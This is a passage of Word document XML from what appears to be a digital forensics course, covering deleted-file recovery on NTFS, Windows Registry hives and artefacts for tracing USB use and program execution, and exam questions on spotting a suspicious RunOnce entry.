          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">↓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="false"/>
              <w:pBdr>
                <w:top w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
                <w:bottom w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
                <w:left w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
                <w:right w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
              </w:pBdr>
              <w:shd w:fill="E6F2F2" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">New files may later reuse the clusters and overwrite the data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Autopsy, such files appear as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">deleted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (red) entries and can be recovered. Success depends on whether the MFT record has been reused and whether the data clusters were overwritten.</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898"/>
        <w:gridCol w:w="5848"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="584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Recovery</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MFT record and clusters intact</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Full recovery with original name, path, timestamps</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MFT record reused, clusters intact</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Recover by file carving (content only, no name)</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Clusters partly overwritten</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Partial recovery only</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Clusters overwritten / securely wiped</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Not recoverable</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SSD with TRIM enabled</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drive may erase freed blocks on its own — recovery is often impossible</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Answer to a common exam question</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">When does the data of a deleted NTFS file become unrecoverable?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> When the clusters it occupied are reallocated and overwritten by new data (or are wiped, or erased by the SSD’s TRIM function). Until then, the data can usually be recovered even though the MFT entry is marked inactive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Windows Registry Forensics</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Windows Registry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a hierarchical database that stores settings for Windows, installed programs, hardware and users. It is organised as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like folders) containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like entries). Each key has a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">last-written timestamp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is very useful in timelines. For an investigator the registry is a diary of system and user activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Registry hives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The registry is stored on disk as several files called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">hives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. System hives are in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\config\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; each user’s hive is in their profile folder.</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411"/>
        <w:gridCol w:w="4386"/>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Hive file</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Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="438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Typical forensic content</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SAM</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System32\config\SAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="438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Local user accounts, account creation, last login, login counts, password hashes (protected)</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SECURITY</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System32\config\SECURITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="438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 policy, audit policy, cached domain credentials, LSA secrets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SOFTWARE</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System32\config\SOFTWARE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="438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Installed programs, Windows version, autorun entries (HKLM Run), network profiles, time zone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SYSTEM</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System32\config\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="438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Hardware and USB devices, services, computer name, mounted devices, ShimCache (AppCompatCache)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NTUSER.DAT</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C:\Users\&lt;user&gt;\NTUSER.DAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="438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User-specific activity: recent documents, UserAssist, typed URLs, user autorun, mounted drives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UsrClass.dat</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Users\&lt;user&gt;\AppData\Local\Microsoft\Windows\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="438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Per-user settings, including Shellbags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigators copy hives out of the image and view them with tools such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Autopsy’s Registry viewer</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Registry Explorer</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RegRipper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Regedit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on a mounted copy only).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key registry artefacts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4191"/>
        <w:gridCol w:w="3411"/>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Artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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Key location (simplified)</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tells you</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USB device history (USBSTOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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SYSTEM\CurrentControlSet\Enum\USBSTOR\</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Every USB storage device ever connected: vendor, product, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">serial number</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; first and last connection times</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MountedDevices / MountPoints2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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SYSTEM\MountedDevices; NTUSER.DAT …\MountPoints2</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Drive letter assigned to the device, and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">which user</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> had it connected</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RecentDocs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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NTUSER.DAT …\Explorer\RecentDocs</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Files recently opened by the user, by extension, in order of use</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OpenSavePidlMRU / LastVisitedMRU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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NTUSER.DAT …\Explorer\ComDlg32</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Files opened or saved through Open/Save dialogs; the program that used them</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UserAssist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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NTUSER.DAT …\Explorer\UserAssist</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Programs launched through the Windows GUI: run count and last run time. Names are encoded in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ROT13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and must be decoded</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ShimCache (AppCompatCache)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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 …\Session Manager\AppCompatCache</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Executables that existed or were run on the system, with file path and modification time</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Run / RunOnce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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HKLM and HKCU …\Windows\CurrentVersion\Run, RunOnce</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Programs set to start automatically — a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">persistence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> mechanism used by malware</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TypedURLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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NTUSER.DAT …\Internet Explorer\TypedURLs</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URLs typed in the address bar (classic Internet Explorer/Edge)</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Installed software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</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 of installed programs, version and install date — e.g. a wiping or hacking tool</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Network and time zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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SOFTWARE\…\NetworkList; SYSTEM …\TimeZoneInformation</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Networks the PC joined; time zone setting needed to interpret timestamps</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Tracing USB use</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">USBSTOR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> shows a device “Kingston DataTraveler” with serial number 0019E06B… first connected 23:49.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MountedDevices</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> shows it was assigned drive letter E:.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MountPoints2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the NTUSER.DAT of user </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">rahul</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> shows that this user had it connected.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">LNK files and RecentDocs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> show files opened from E:. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Shellbags</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> show that the user browsed folders on E:.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Taken together, the evidence suggests that user </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">rahul</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> used this device and handled specific files on it. To confirm that data was </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">copied</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> onto it, the investigator looks for LNK files, file timestamps, and the USB device’s own contents.</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Why is C:\Users\Public\svchost32.exe in RunOnce suspicious?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The real Windows program is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">svchost.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, located in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Windows\System32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. The name </w:t>
            </w:r>
            <w:r>
              <w:rPr>
